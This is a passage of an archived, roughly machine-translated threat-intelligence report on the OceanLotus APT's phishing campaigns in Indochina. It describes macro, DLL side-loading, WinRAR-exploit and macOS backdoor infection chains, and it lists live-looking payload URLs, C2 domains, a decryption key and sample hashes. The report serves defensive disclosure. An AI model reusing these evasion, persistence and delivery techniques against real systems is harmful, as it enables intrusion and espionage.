{
	"id": "5c985505-30e5-4ceb-97a9-425337e826d7",
	"created_at": "2026-04-06T00:14:15.664886Z",
	"updated_at": "2026-04-10T03:36:48.224694Z",
	"deleted_at": null,
	"sha1_hash": "a76f3d080039a78ae0632cfb3e281e6143bf3534",
	"title": "奇安信威胁情报中心",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 15883354,
	"plain_text": "奇安信威胁情报中心\r\nArchived: 2026-04-05 23:07:26 UTC\r\nOverview\r\nOceanLotus is an APT Group with alleged Vietnamese background. The group was first revealed and named by\r\nSkyEye Team in May 2015. Its attack activities can be traced back to April 2012. The targets include China's\r\nmaritime institutions, maritime construction, scientific research institutes and shipping enterprises.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 1 of 79\n\nIn fact, according to reports of various security vendors, OceanLotus also attacked several countries, including\r\nCambodia, Thailand, Laos, even some victims in Vietnam, like opinion leaders, media, real estate companies,\r\nforeign enterprises and banks.\r\nRedDrip Team (formerly SkyEye Team) has been to OceanLotus to keep track of high strength, groupactivity,\r\nfound it in the near future to Indochinese Peninsula countries since 2019 the latest attack activity used in the initial\r\nlaunch load files and attack using the technology, and combined with the QiAnXin threat intelligence data,\r\nassociated with a series of attacks.\r\nIn this report, we share our summary of the latest attack techniques, attack payloads and related attacks of the\r\nOceanLotus, hoping that we can jointly improve understanding of OceanLotus group, an extremely active APT\r\ngroup.\r\nAttacks on Countries\r\nThe following is a list of typical cases of attacks against some countries on Indochinese Peninsula since the end of\r\n2018. For other unmentioned samples, please refer to the IOC list at the end of this report.\r\nVietnam\r\nBait Compression Files\r\nOn April 1, 2019, RedDrip discovered a Vietnamese file name \"Hop dong sungroup.rar\" in the process of daily\r\nmonitoring the attack activities of the OceanLotus.\r\nThe English version is \"Sun Group contract\". The compressed package contains winword.exe which is renamed as\r\n“Noi dung chi tiet hop dong sungroup can chinh sua”.\r\nIn addition, we are also associated with another package decoy SUN_GROUP_CORPORATION that translates as\r\n\"Sun Group Corporation\". The file name in the zip package is as follows:\r\nNoi dung can xac thuc va sua GUI den CONG TY CO PHAN TAP DOAN MAT TROI Bo Tai chinh. exe\r\nIt turned out that Sun City Group was actually one of the largest real estate developers in Vietnam.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 2 of 79\n\nBoth samples were uploaded by Vietnam. Therefore, we speculate that the OceanLotus Group in the Sun City\r\ninternal staff fishing attacks.\r\nIn addition to targeting the Vietnamese real estate industry, we also found that the group would conduct phishing\r\nattacks against the national bank of Vietnam:\r\nThe compressed package of the related samples is called cplh-nhnn-01-209.rar. The corresponding date of the\r\nsamples is January 22, 2019, and the attack is most likely to occur in a similar period.\r\nThe Chinese name of the compressed package is: \"national bank of Vietnam -- 01-209.rar\";The winword. Exe in\r\nthe package was renamed \"chiphilienhoannhnn-bc209.exe\", which translated as \"state bank of Vietnam sbv-bc\r\n209.exe\".\r\nSBV refers to Vietnam's central bank, the state bank of Vietnam (SBV), while BC actually refers to B2C, or third-party payment.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 3 of 79\n\nThis attack is likely to be launched against the bank's internal staff, similar to the document transmission process\r\ndisguised as a third-party payment within the bank.\r\nIn addition, there are anti-virus software related information through the disguise of fishing.\r\nCompressed package name: \"Gui lai cho MS.MAI post content kaspersky. Rar\" (return MS.MAI post content\r\nkaspersky)\r\nWe also see oil as a theme for fishing:\r\n\"Tinh dau can mua\" (essential oil required), the PE file in the package is called \"details about purchase and\r\npurchase\"\r\nBait Documents\r\nThe above compression package contains the Kaspersky name bait, and there is also a similar name \"Content\r\nmarketing kaspersky.doc\" in the bait document. After opening the document, it will be shown as follows, enabling\r\nthe macro attack method for the Vietnamese version of the induced click.\r\nIn addition, we also found a large number of OceanLotus disguised as a resume attack fishing activities, we\r\ninternally named it OceanCV activity, and this activity will directly OceanLotus commonly used three macro\r\nattack means all exposure.\r\nFirst of all, we analyze the sample names. It can be seen that the sample names all start with CV and have the\r\ncharacteristics of naming. There are three main types:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 4 of 79\n\n1, CV- name (e.g., cv-nguyenquynhchi.docx)\r\n2. CV- name - position (e.g. CV-AnthonyWei- customerservice. docx)\r\n3. CV- random number + English (e.g. Cv-103237-ewqdsd.doc)\r\nIt is worth noting that some samples will show the identity indicating the need to enable macro after opening:\r\nHowever, when you pull down the progress bar, you will find resumes written in Vietnamese, which is true for\r\nmost of the samples in the series of activities, and the resumes are inconsistent.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 5 of 79\n\nAnd these sample phishing resumes use different methods.Some use the OceanLotus MSO macro (RedDrip\r\ninternally named MSOMacro)\r\nSome use template injection techniques:\r\nSome use the technique of converting macro code to a 1-pound font hidden in a document (later upgraded to a\r\nwhite 1-pound font, internally named OHNMacro for RedDrip).\r\nIn the following sections we will examine each of these three macro usage analyses in detail.\r\nAccording to this batch of resume samples, we conducted homologous sample correlation for these three macro\r\ndocuments, combined with various dimensions, and finally found a large number of exclusive malicious macro\r\nsamples of OceanLotus. Please refer to the relevant section of Office samples for details.\r\nExploit Vulnerabilities of Eternal Blue\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 6 of 79\n\nWe also found that OceanLotus used the \"Eternal blue\" series of vulnerabilities to target companies in Vietnam\r\nthat provided software to the government.\r\nWebsite: https://www.tandan.com.vn/portal/home/default.aspx\r\nTAN DAN JSC for Vietnam's software company.\r\nThe company will provide the government with mail servers, official gazette database systems, citizenship\r\nmanagement systems and more.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 7 of 79\n\nAfter the attack is successful, it will distribute Trojan horses. In the report \"suspected\" of \"OceanLotus\"\r\norganization's early attack activities against domestic colleges and universities \"compiled by us last year, the\r\nTrojan horses used eternal blue to attack colleges and universities are consistent.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/\r\nPhishing Attacks by Exploiting WinRAR Vulnerability\r\nIn addition to traditional malicious payloads that take advantage of black and white mechanisms, malicious\r\npayloads that infiltrate tweets and websites, OceanLotus also takes advantage of the latest Winrar vulnerability to\r\nlaunch attacks against Vietnam.Here is one of the cases we captured:\r\nThe package name is \"tut_photoshop_scan_bank_id.rar\"\r\nFrom the sample trigger vulnerability extract file, its name is called CocCocUpated. Exe\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 8 of 79\n\nCOCCOC is a Vietnam was founded in 2013 as a new technology company, provides online Internet search\r\nengine services and browsers, the main language used in Vietnamese and English, the search service is Vietnam's\r\nmost mature, browser is based on Google Chromium development, support Windows, iOS platform.\r\nThrough analysis, we found that it was the early Trojan framework of OceanLotus, and we also put it in the\r\nsection of sample analysis for separate analysis.\r\nBait, of course, in addition to the above, we also found that the OceanLotus will use compressed package\r\nembedded MP4 way exploit, compressed package name translated roughly \"Cho exclusive blockbuster movie\"\r\nRay hospital, including Cho Ray refers to ho chi minh city, Vietnam water wok hospital (ChợRẫy), ho chi minh\r\ncity, Vietnam's largest general hospital.\r\nThe package contains two MP4 files, one of which is identical to the package name, and a video translated as \"the\r\nteam began staffing after the exclusive stroke press release.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 9 of 79\n\nSimilarly, released for coccocupdate.exe\r\nAnd its distribute means is the way that USES network dish to undertake putting however.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 10 of 79\n\nThis new Trojan horse will be analyzed in detail in the section of sample analysis.\r\nMAC Backdoor\r\nIn addition to targeting Vietnam on the Windows platform, OceanLotus also attacks Vietnamese users on the\r\nMacOS platform. The following samples are typical of recent launches, which use such means as browser update,\r\nFlash installation update package, font installation package, disguised as a document to actually attack the\r\ninstaller.\r\nInterestingly, when we were analyzing the samples disguised as Firefox, it would show the interface of installing\r\nFirefox after opening. Double-click the icon of Firefox, and the Trojan horse would be executed:\r\nWhen you click on the update, even if you are disconnected from the Internet, the download progress bar will\r\nappear.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 11 of 79\n\nThis is the fake interface the attacker drew:\r\nSimilarly, in the following chapters, this batch of MacOS samples targeted at Vietnam were extended for analysis.\r\nCambodia\r\nHere is this year's latest attack on Cambodia by OceanLotus, called \"report-no.0162(02 Pages).doc.\"\r\nThe sample operation process is shown in the following figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 12 of 79\n\nThe samples associated by homology are as follows:\r\nMD5 Filename Create time\r\n56b5a96b8582b32ad50d6b6d9e980ce7 Request Comment on UYFC.doc 2019-03-18 04:12:00\r\n3fd2a37c3b8d9eb587c71ceb8e3bb085 No.039714(cdri).doc 2019-03-25 04:33:00\r\nThe associated sample for the Cambodia attack Request Comment on uyfc.doc.\r\nThe UYFC is actually a Cambodian youth federation, the | UYFC ngo, which attacks people who might be\r\nassociated with the conference.\r\nDocument screenshot:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 13 of 79\n\nNo.039714(cdri).doc\r\nIt is clear that the attack on Cambodia also used OHN macros.\r\nIn addition to scanning documents, last year hilina also Scanned Cambodia using MacOS samples. Related\r\nsample: \"Scanned Investment report-july 2018.zip\"\r\nThailand\r\nThe typical examples of attacks by OceanLotus against Thailand since 2019 are as follows\r\nMD5 Filename Create time\r\n4c30e792218d5526f6499d235448bdd9\r\nForm_Provisional Agenda of the ASEAN Senior\r\nOfficials Preparatory Meeting.doc\r\n2019-01-21\r\n02:25:00\r\nd8a5a375da7798be781cf3ea689ae7ab Program Retreat.doc\r\n2019-01-14\r\n03:50:00\r\nIt is named Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 14 of 79\n\nActually, the meeting was successfully held in Thailand on April 6, 2019. From the creation time and upload time\r\nof the document (2019-03-22), it can be seen that OceanLotus has a strong ability to obtain current affairs and a\r\nlong preparatory cycle.\r\nThe second document, Program Retreat, may target the military, but the broader meaning of the name does not\r\nmake the attacker's heart sink.\r\nBesides, the document contents of the two files in the above table are the same. The following is the screenshot\r\nafter restoring the shellcode font in the document:\r\nIt also USES OHN macros.\r\nSample Analysis\r\nMSO Macro Documents\r\nThe \"MSO macro\" of OceanLotus has commonality. We analyzed one sample, and it can be seen that the extracted\r\nmacro code is as follows:\r\nFirst it adds the Data through the Data variable, and then after base64 decryption, decrypts the VBS code, releases\r\nit into the msohtml.log, and copies wscript. Exe into Windows \\SysWOW64\\msohtml.exe:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 15 of 79\n\nExecute the msohtml.log script by copying msohtml.exe (that is, wcript.exe), as shown in the figure below:\r\nAnd create scheduled tasks:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 16 of 79\n\nThe contents of the msohtml.log script are as follows. It will execute the data in the cs array after xor 518:\r\nThe decrypted script, as shown in the figure, will execute the malicious code after the elements in the cs array xor\r\n415:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 17 of 79\n\nAfter decryption of malicious code as shown in figure: will be downloaded from\r\nhttps://open.betaoffice.net/cvfemale.png code and execution.\r\nOHN Macro Documents\r\nExtract the macro code from the sample, open the word document, it will prompt to enable the macro, after\r\nenabling the macro will execute this function:\r\nThen it will copy its office document to temp and name it random, as shown in the figure:\r\nThen modify the security of the registry macro:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 18 of 79\n\nTake the data in the last five paragraphs of the total number of paragraphs (5 paragraphs in total, 2 blank lines, 3\r\nwith hex data), convert it from hex to bin, add it to the macro code of the new file, and then set the\r\nx_N0th1ngH3r3 method to execute the macro code after 1 second:\r\nThe format file is 1 pound text, which cannot be seen by the naked eye, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 19 of 79\n\nThe first paragraph clears the data after formatting:\r\nAfter the data is converted into bin, it will be converted into the second macro code, and the first macro code will\r\nexecute the x_N0th1ngH3r3 function, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 20 of 79\n\nExecute the macro code of penultimate paragraph 3 in the same way, as shown in the figure:\r\nIt also starts with this function:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 21 of 79\n\nTake the data of the penultimate paragraph, as shown in the figure:\r\nThe data are as follows:\r\nThen write to memory for execution:\r\nAfter the data hex is converted into bin, shellcode which is mostly used by OceanLotus is shown as follows:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 22 of 79\n\nConfiguration file:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 23 of 79\n\nThis is the way that shellcode is loaded with three macros, mostly to combat shellcode static killing.\r\nTemplate Injection Documents\r\nThe template injection class document of OceanLotus has universality, after the document starts, it will load\r\nXXX.XXX/XXX. PNG\r\nAnd do the following.\r\nTo give an example of one of these attacks, fdsw.png is an office compound document:\r\n(d497bd06b34a046841bb63d3bf20e605)\r\nIf SysWOW64\\cmd.exe file exists, the system is either 32-bit or 64-bit.\r\nDepending on the system, the file is taken out of the cell, base64 decoded, and dropped to: %appdata%\r\nmain_background-png:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 24 of 79\n\nThe hijacked csids are \"{2dea658f-54c1-4227-af9b-260ab5fc3543}\".\r\nAccording to this CSID, it is the CSID of the DLL that is hijacked: %SystemRoot%\\System32\\ playsndsrv.dll\r\nThis DLL is used to play sound.\r\nThe extraction content of base64 content in the cell is as follows:\r\nBase64 decodes one of the 32-bit PE, Dllmain will apply 0x34aca byte memory space, and then write the\r\nshellcode at 0x10012760 into memory, and execute it through the thread:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 25 of 79\n\nShellcode goes to the pointer at offset 0xfc8 when the parameter is passed to the function of sub_160018:\r\nThe address offset 0xfc8 holds the command line argument and a PE:\r\nThe function of sub_160018 is mainly to load the following PE in memory, and then pass the command line to\r\nexecute according to the command line parameters. The figure below is the code of receiving the command line\r\nparameters for the PE:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 26 of 79\n\nRequest the URL, the downloaded data, after DES decryption, in memory load up.\r\nFind more samples through association analysis:\r\nSort by compile time as follows:\r\nAccording to the table comparison, the command line of the first sample is different from other samples. It can be\r\nknown that it should be the sample of different attacks. This sample is the annotated version, which will load\r\nshellcode in memory in the same way.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 27 of 79\n\nThe PE included in the file is found in a hacker's toolkit. The file name is CMD [w7][x64].\r\nThe function of this sample is to execute the McOds. Exe (this is the exe file name of the white utility program\r\nused by OceanLotus) through the CMD [w7][x64]. Exe contained in the file, while the McOds. Exe should be the\r\nfile released by the dropper before.\r\nThe upload place of this sample is VN, the upload time is July 31, and the file name is msvchr.exe, we can know\r\nthat this sample should be aimed at Vietnam attack:\r\nThrough the analysis and comparison of these samples, we can know that these samples should be used to\r\nspecifically execute exe file in memory, and pass command line parameters of the Loader program, is the last six\r\nmonths to use the new malicious code framework, specifically used to develop against static kill.\r\nIt is found that two samples are 10M, and the end is filled with 0x20 (space), which is filled into a large file to\r\navoid being uploaded:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 28 of 79\n\nAnd the way shellcode is loaded for these samples is a little different:\r\n1. Most samples are executed shellcode by creating threads\r\n2, compile the earliest version of the sample, in the form of services, with comments, in serviceMain create thread\r\nexecution shellcode\r\n3. A small part of samples execute shellcode directly on the main thread\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 29 of 79\n\nwwlib DLL Injection\r\nThrough the analysis of the compression package cplh-nhnn-01-2019. Rar downloaded by amazon AWS, it is\r\nfound that the compression package packages winword.\r\nThey use winword. Exe white use technology, winword. Exe will load the same directory by default wwlib. DLL;\r\nThe reason why winword. Exe white use technology, because winword. Exe icon is the icon of word, and\r\nwwlib.dll is hidden, so they only need to change winword.\r\nWwlib. DLL malicious code in the FMain export function, winword. Exe will open the default call FMain this\r\nexport function, malicious code will be executed;Then base64 decodes the shellcode that comes with it and\r\nexecutes it in the main thread:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 30 of 79\n\nLocation of base64-encoded shellcode in the sample:\r\nIt is found that the decoded shellcode and the previous shellcode are loaded in the same way. The data offset\r\n0x6b6 is passed to the sub_16 function as the parameter:\r\nThe function sub_16 is used to decrypt the data following 0x6b6, decrypt the second shellcode and execute it. The\r\nfigure below is the second shellcode decrypted:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 31 of 79\n\nThe second shellcode shellcode by DES declassified out the third layer, the key to\r\n\"asfahdiuqhu93ye7891h9ubioufcf\" :\r\nThe third layer of shellcode in front of the entrance and two shellcode entry is the same, also call/pop way find\r\nshellcode the positions of the loaded into memory, and then take the code at the back of the data (0 x8c6 offset)\r\nwhen the parameters are passed to the sub_16 function, parameters passed as: HTTPS: / /\r\noffice.allsafebrowsing.com/AwPT:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 32 of 79\n\nThe shellcode from HTTPS: / / office.allsafebrowsing.com/AwPT download files, and then performed in the\r\nmemory, the image below to download the file using the UA:\r\nThe downloaded AwPT file from cobaltstrike is the shellcode module:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 33 of 79\n\nThe following figure shows the algorithm to decrypt the attached data at the end. Like the shellcode module from\r\ncobaltstrike, the difference from before is that the shift moves 8 bytes backward:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 34 of 79\n\nThe decrypted data is a beacon module, as shown in the figure:\r\nExtract the configuration file information as follows:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 35 of 79\n\nMAC Backdoor\r\nThe analysis object is a MAC backdoor disguised as a browser.\r\nThe extracted file structure is as follows, which is a macOS installation package, as shown in the figure:\r\nAfter opening it, the interface for installing Firefox will be displayed. Double-click the Firefox icon, and the\r\nDropper process will be executed:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 36 of 79\n\nIt will pop up the interface of fake FireFox and click update. Even if the Internet is disconnected, the download\r\nprogress bar will appear, which is forged by the attacker:\r\nThis is the fake interface the attacker drew:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 37 of 79\n\nAfter running, Dropper will create the following APP in the Library directory to start up:\r\n/ Users/username/Library/LaunchAgents/com, apple. Spell. Agent. The plist\r\nThe app in the startup directory to the directory: / Users/username/Library/Spelling/spellagentd file, the file in\r\nOSX bin file, code did add case processing, will decrypt the shellcode in memory and execute, as shown in figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 38 of 79\n\nAfter execution back to the address: rio.imbandaad.com, through a Post request packets sent to the server:\r\nhttp://rio.imbandaad.com/v3/yQ/r/eiCu1gd6Qme.js\r\nBut the address is no longer valid. The signature information of the App is as follows:\r\nCocCocUpdate\r\nCocCocUpdate is a Dropper that is released into the startup directory using a compression package constructed by\r\ncve-2018-20250 vulnerability. The screenshot of the compression package is as follows:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 39 of 79\n\nAfter restart, it will be executed by the system, and the corresponding file is coccocupdate.exe. We have exposed a\r\nDropper version of random key passing through command line parameters in 2015. This coccocupdate.exe is\r\nimproved to pass random key through environment variables.\r\nThe specific steps are as follows:\r\n1. Gets the full path of the executed coccocupdate.exe in an environment variable with a value of\r\n\"C091A8C8\" for later reading.\r\n1. Randomly generate a 128-byte key and store it in an environment variable with a value of\r\n\"DB99050C\";Used to encrypt the shellcode data that follows them.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 40 of 79\n\n1. Encrypt the data at 0x40E000 by random key, and write the modified PE file to Temp directory, and then\r\nexecute it through CreateProcess:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 41 of 79\n\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 42 of 79\n\nThe following figure shows the comparison between the original file and the encrypted file. It can be seen that\r\nthere is no change in the code segment, except that the array of global variables 0xd000 is encrypted by the\r\nrandom key.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 43 of 79\n\n1. If the file is bundled, it will decrypt and release a bundled file (the key is in the last 64 bytes) from a\r\nresource of resource type 10 and resource number 1, such as a Word document or a normal file, and then\r\nexecute it through ShellExectue. The file does not use the decoy file to release the bundled file, so the ID is\r\nwrong:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 44 of 79\n\n5. The executed temp process will first determine whether there are environment variables of \"C091A8C8\" set, if\r\nany\r\nIf it is encrypted by the original Dropper, it will read the randomly generated 128-bit key from the \"DB99050C\"\r\nenvironment variable, decrypt the code at 0x40e000, and then decrypt one more layer and decompress one more\r\nlayer, because the code has one layer of encryption and compression in the original Dropper:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 45 of 79\n\nExtract:\r\n6. The decrypted file is a PE file, which will be executed in memory after decryption, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 46 of 79\n\nThis code will release 3 files to c:\\program files\\ Microsoft \\ Windows \\system restore\\ directory:\r\nThen create the service and point to the rstrui.exe file:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 47 of 79\n\nRstrui. Exe is an attacker to write a loader, disguised Microsoft Windows System Restore icon:\r\nMainly responsible for loading {9fbaa883-1709-4de3-8c1b-48683f740a5f} in the same directory through\r\nrundll32.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 48 of 79\n\nFile name {9fbaa883-1709-4de3-8c1b-48683f740a5f}. Clsid file when a DllLoader, PE information is as follows:\r\nThe function of this DLL is mainly to decrypt and load shellcode with the same directory name as {9fbaa883-\r\n1709-4de3-8c1b-48683f740a5f}, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 49 of 79\n\nEnter the sub_10001480 function, the contents of the file will be decrypted, and the PE will be loaded in memory:\r\nThe PE after decryption in memory is shown in the figure below:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 50 of 79\n\nDllMain creates a thread to execute the export function Version. In the Version function, the remote control\r\nfunction will be executed all the time. If it fails, the sleep 6s will continue.\r\nThen a number less than 4 will be randomly generated, and C2 will be randomly selected, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 51 of 79\n\nOne of the functions to decrypt C2 is as follows:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 52 of 79\n\nThe 4 domain names are as follows:\r\nimages.ucange.com\r\npreload.ointalt.com\r\nmaintenance.allidayser.com\r\nreport.cottallid.com\r\nThe hash of the sample associated with the domain name is as follows:\r\n2 ea902abe453b70cf77e402cc16eb552\r\ncc7b9ee1b026e16a9d37e3988a714479\r\ne60c35dd36c9f525007955e6b3a88b82\r\nBinding files in this homologous sample:\r\nCc7b9ee1b026e16a9d37e3988a714479 bundled office files content is as follows:\r\nTranslation:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 53 of 79\n\n2 ea902abe453b70cf77e402cc16eb552 bundled Office files content is as follows:\r\nTranslation:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 54 of 79\n\nThe flow chart of the Dropper is as follows:\r\nA comparison between this version of Dropper and the 2015 version of Dropper:\r\n1. The Dropper in 2015 is to pass the randomly generated decryption key through the command line parameter,\r\nwhile the Dropper in this version is to pass the key through the environment variables between the process chains\r\n(API is SetEnvironmentVariableW and GetEnvironmentVariableW).\r\n2, the presence of the 2015 version of the detection virtual machine, this version does not exist in the detection\r\nvirtual machine.\r\nThe following figure is: Dropper version of OceanLotus in 2015 passes the key through \"-- ping\" :\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 55 of 79\n\nThe following figure is: in this Dropper version, the randomly generated key is stored in the environment variable:\r\nCorrelation Analysis\r\nTrojan Samples\r\nThrough the analysis of the general backdoor of OceanLotus, a large number of homologous samples were found\r\nthrough the features in its code:\r\nMD5 Compile time The file size Module name\r\nac5f18f1c20901472d4708bd06a2d191 In the 2018-06-13 s, 11:33:33 93184 DllHijack. DLL\r\n221e9962c9e7da3646619ccc47338ee8 In the 2018-06-25 s, 02:35:46 93184 DllHijack. DLL\r\n26ea45578e05040deb0cc46ea3103184 In the 2018-07-02 s, 02:11:55 142336 DllHijack. DLL\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 56 of 79\n\n200033d043c13b88d121f2c1d8d2dfdf In the 2018-07-09 s, 03:00:10 2053632 DllHijack. DLL\r\n9972111cc944d20c9b315fd56eb3a177 In the 2018-07-13 s, 03:48:03 142336 DllHijack. DLL\r\nbf040c081ad1b051fdf3e8ba458d3a9c In the 2018-07-23 s, 03:11:16 93184 DllHijack. DLL\r\n6c2a8612c6511df2876bdb124c33d3e1 In the 2018-07-23 s, 04:50:51 93184 DllHijack. DLL\r\n7dace8f91a35766e9c66dd6258552b02 In the 2018-07-23 s, 12:59:23 142336 DllHijack. DLL\r\nc9093362a83b0e7672a161fd9ef9498a In the 2018-08-07 s, 03:12:39 92672 DllHijack. DLL\r\n38f9655c72474b6c97dc9db9b3609677 In the 2018-08-09 s, 10:11:58 93184 DllHijack. DLL\r\n4bb4d19b42e74bd11459c9358c1a6f01 In the 2018-08-13 s, 02:21:13 168960 DllHijack. DLL\r\nf42611ac0ea2c66d9f27ae14706c1b00 In the 2018-08-13 s, 08:46:56 92672 DllHijack. 